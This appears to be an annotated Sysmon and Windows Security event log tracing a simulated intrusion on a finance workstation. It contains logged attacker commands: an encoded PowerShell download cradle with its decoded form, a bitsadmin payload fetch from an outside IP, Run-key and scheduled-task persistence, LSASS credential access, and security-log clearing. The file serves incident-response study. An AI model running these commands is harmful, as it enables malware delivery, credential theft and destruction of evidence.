{"EventID":1,"TimeCreated":"2024-11-15T16:42:33Z","Computer":"WS-CFO-01.lifetechpharma.local","Channel":"Microsoft-Windows-Sysmon/Operational","RuleName":"T1059.001","UtcTime":"2024-11-15 16:42:33.441","ProcessGuid":"{8f2a4b91-3c1e-6541-0000-0010d4a82b01}","ProcessId":3784,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.19041.1","Description":"Windows PowerShell","Product":"Microsoft Windows Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"powershell.exe  -NonI -W Hidden -Enc JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAJwBNAG8AegBpAGwAbABhAC8ANQAuADAAJwApADsAJABkAD0AJABjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AMgAwADMALgAwAC4AMQAxADMALgA4ADcALwB1AHAAZABhAHQAZQAnACkA","CurrentDirectory":"C:\\Users\\m.cohen\\","User":"LIFETECHPHARMA\\m.cohen","LogonGuid":"{8f2a4b91-2a14-6541-0000-002088f43a00}","LogonId":"0x3af488","TerminalSessionId":1,"IntegrityLevel":"High","Hashes":"MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1848474F57","ParentProcessGuid":"{8f2a4b91-1b88-6541-0000-00101c2a0900}","ParentProcessId":2240,"ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE","ParentCommandLine":"\"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE\"","ParentUser":"LIFETECHPHARMA\\m.cohen","analyst_note":"🔴 TRIGGERING EVENT: Outlook → PowerShell -NonI -W Hidden -Enc | Encoded payload decodes to: $c=New-Object System.Net.WebClient;$c.Headers.Add('User-Agent','Mozilla/5.0');$d=$c.DownloadString('https://203.0.113.87/update') | Downloads second stage"}
{"EventID":3,"TimeCreated":"2024-11-15T16:42:41Z","Computer":"WS-CFO-01.lifetechpharma.local","Channel":"Microsoft-Windows-Sysmon/Operational","RuleName":"T1071.001","UtcTime":"2024-11-15 16:42:41.882","ProcessGuid":"{8f2a4b91-3c1e-6541-0000-0010d4a82b01}","ProcessId":3784,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","User":"LIFETECHPHARMA\\m.cohen","Protocol":"tcp","Initiated":true,"SourceIsIpv6":false,"SourceIp":"10.10.1.45","SourceHostname":"WS-CFO-01.lifetechpharma.local","SourcePort":51204,"DestinationIsIpv6":false,"DestinationIp":"203.0.113.87","DestinationHostname":"-","DestinationPort":443,"DestinationPortName":"https","analyst_note":"C2 connection #1 from powershell.exe to 203.0.113.87:443 — downloads svchost32.exe"}
{"EventID":11,"TimeCreated":"2024-11-15T16:43:08Z","Computer":"WS-CFO-01.lifetechpharma.local","Channel":"Microsoft-Windows-Sysmon/Operational","RuleName":"T1547.001","UtcTime":"2024-11-15 16:43:08.114","ProcessGuid":"{8f2a4b91-3c1e-6541-0000-0010d4a82b01}","ProcessId":3784,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\m.cohen\\AppData\\Roaming\\Microsoft\\Windows\\svchost32.exe","CreationUtcTime":"2024-11-15 16:43:08.114","analyst_note":"⚠ svchost32.exe dropped to AppData\\Roaming — masquerading as legitimate svchost. Fake PE timestamp: 2018-04-09T08:00:00Z (timestomped)"}
{"EventID":1,"TimeCreated":"2024-11-15T16:43:12Z","Computer":"WS-CFO-01.lifetechpharma.local","Channel":"Microsoft-Windows-Sysmon/Operational","RuleName":"T1547.001","UtcTime":"2024-11-15 16:43:12.771","ProcessGuid":"{8f2a4b91-3c44-6541-0000-0010e8b12c01}","ProcessId":4128,"Image":"C:\\Users\\m.cohen\\AppData\\Roaming\\Microsoft\\Windows\\svchost32.exe","FileVersion":"1.0.0.0","Description":"Windows Host Service","Product":"Windows Operating System","Company":"Microsoft Corporation","OriginalFileName":"svchost32.exe","CommandLine":"\"C:\\Users\\m.cohen\\AppData\\Roaming\\Microsoft\\Windows\\svchost32.exe\" -k netsvcs","CurrentDirectory":"C:\\Windows\\system32\\","User":"LIFETECHPHARMA\\m.cohen","LogonGuid":"{8f2a4b91-2a14-6541-0000-002088f43a00}","LogonId":"0x3af488","TerminalSessionId":1,"IntegrityLevel":"High","Hashes":"MD5=A8F5F167F44F4964E6C998DEF96B5E7D,SHA256=3B4C14A87E5F9D8C2A1F4E6B9C0D2E7A1B3C5D8F2A4E6C8B0D3E5A7C1F4B8D2E","ParentProcessGuid":"{8f2a4b91-3c1e-6541-0000-0010d4a82b01}","ParentProcessId":3784,"ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentUser":"LIFETECHPHARMA\\m.cohen","analyst_note":"svchost32.exe launched by PowerShell — implant first execution"}
{"EventID":13,"TimeCreated":"2024-11-15T16:43:15Z","Computer":"WS-CFO-01.lifetechpharma.local","Channel":"Microsoft-Windows-Sysmon/Operational","RuleName":"T1547.001","UtcTime":"2024-11-15 16:43:15.009","ProcessGuid":"{8f2a4b91-3c1e-6541-0000-0010d4a82b01}","ProcessId":3784,"Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","EventType":"SetValue","TargetObject":"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsHostSvc","Details":"C:\\Users\\m.cohen\\AppData\\Roaming\\Microsoft\\Windows\\svchost32.exe -k netsvcs","analyst_note":"⚠ Registry Run Key persistence — HKCU Run key set to launch svchost32.exe on login"}
{"EventID":10,"TimeCreated":"2024-11-15T16:46:22Z","Computer":"WS-CFO-01.lifetechpharma.local","Channel":"Microsoft-Windows-Sysmon/Operational","RuleName":"T1003.001","UtcTime":"2024-11-15 16:46:22.338","SourceProcessGuid":"{8f2a4b91-3c44-6541-0000-0010e8b12c01}","SourceProcessId":4128,"SourceImage":"C:\\Users\\m.cohen\\AppData\\Roaming\\Microsoft\\Windows\\svchost32.exe","SourceUser":"LIFETECHPHARMA\\m.cohen","TargetProcessGuid":"{8f2a4b91-0b11-6541-0000-001088742200}","TargetProcessId":728,"TargetImage":"C:\\Windows\\System32\\lsass.exe","TargetUser":"NT AUTHORITY\\SYSTEM","GrantedAccess":"0x1010","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+9d314|C:\\Windows\\System32\\KERNELBASE.dll+13d0a|UNKNOWN(00007FF8B4822F4A)","analyst_note":"🔴 LSASS memory access from svchost32.exe — GrantedAccess 0x1010 (PROCESS_QUERY_INFORMATION | PROCESS_VM_READ). Credential dumping pattern."}
{"EventID":1,"TimeCreated":"2024-11-15T16:51:04Z","Computer":"WS-CFO-01.lifetechpharma.local","Channel":"Microsoft-Windows-Sysmon/Operational","RuleName":"T1197","UtcTime":"2024-11-15 16:51:04.882","ProcessGuid":"{8f2a4b91-3d88-6541-0000-0010f4c23101}","ProcessId":5012,"Image":"C:\\Windows\\System32\\bitsadmin.exe","FileVersion":"7.8.19041.1","CommandLine":"bitsadmin.exe /transfer svcupdate /download /priority FOREGROUND https://203.0.113.87/update2 C:\\Users\\m.cohen\\AppData\\Local\\Temp\\UpdateHelper.tmp","CurrentDirectory":"C:\\Windows\\system32\\","User":"LIFETECHPHARMA\\m.cohen","LogonGuid":"{8f2a4b91-2a14-6541-0000-002088f43a00}","ParentProcessId":4128,"ParentImage":"C:\\Users\\m.cohen\\AppData\\Roaming\\Microsoft\\Windows\\svchost32.exe","analyst_note":"⚠ BITS transfer used to download second-stage payload (UpdateHelper.tmp → UpdateHelper.dll) from 203.0.113.87"}
{"EventID":4698,"TimeCreated":"2024-11-15T16:52:17Z","Computer":"WS-CFO-01.lifetechpharma.local","Channel":"Security","SubjectUserSid":"S-1-5-21-3847948241-1882284908-4023491847-1844","SubjectUserName":"m.cohen","SubjectDomainName":"LIFETECHPHARMA","SubjectLogonId":"0x3af488","TaskName":"\\Microsoft\\Windows\\WindowsUpdate\\ScheduledUpdateCheck","TaskContent":"<?xml version=\"1.0\" ?><Task version=\"1.2\"><Triggers><CalendarTrigger><StartBoundary>2024-11-15T18:00:00</StartBoundary><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers><Actions><Exec><Command>C:\\Users\\m.cohen\\AppData\\Roaming\\Microsoft\\Windows\\svchost32.exe</Command><Arguments>-k netsvcs</Arguments></Exec></Actions></Task>","analyst_note":"⚠ Scheduled task created for persistence — masquerades as Windows Update, runs svchost32.exe daily at 18:00"}
{"EventID":3,"TimeCreated":"2024-11-15T18:52:04Z","Computer":"WS-CFO-01.lifetechpharma.local","Channel":"Microsoft-Windows-Sysmon/Operational","RuleName":"T1021.003","UtcTime":"2024-11-15 18:52:04.221","ProcessGuid":"{8f2a4b91-3c44-6541-0000-0010e8b12c01}","ProcessId":4128,"Image":"C:\\Users\\m.cohen\\AppData\\Roaming\\Microsoft\\Windows\\svchost32.exe","User":"LIFETECHPHARMA\\m.cohen","Protocol":"tcp","Initiated":true,"SourceIsIpv6":false,"SourceIp":"10.10.1.45","SourceHostname":"WS-CFO-01.lifetechpharma.local","SourcePort":51401,"DestinationIsIpv6":false,"DestinationIp":"10.10.2.20","DestinationHostname":"SERVER-FIN-01.lifetechpharma.local","DestinationPort":135,"DestinationPortName":"epmap","analyst_note":"⚠ Lateral movement initiation — WMI RPC port 135 to SERVER-FIN-01 from svchost32.exe"}
{"EventID":1,"TimeCreated":"2024-11-15T19:14:22Z","Computer":"WS-CFO-01.lifetechpharma.local","Channel":"Microsoft-Windows-Sysmon/Operational","RuleName":"T1070.001","UtcTime":"2024-11-15 19:14:22.004","ProcessGuid":"{8f2a4b91-4a11-6541-0000-001022c44201}","ProcessId":6204,"Image":"C:\\Windows\\System32\\wevtutil.exe","FileVersion":"10.0.19041.1","CommandLine":"wevtutil.exe cl Security","CurrentDirectory":"C:\\Windows\\system32\\","User":"LIFETECHPHARMA\\m.cohen","LogonGuid":"{8f2a4b91-2a14-6541-0000-002088f43a00}","ParentProcessId":4128,"ParentImage":"C:\\Users\\m.cohen\\AppData\\Roaming\\Microsoft\\Windows\\svchost32.exe","analyst_note":"⚠ Event log cleared — wevtutil cl Security executed by svchost32.exe. Windows Security log on WS-CFO-01 partially cleared. Sysmon log INTACT (tamper-protected channel)."}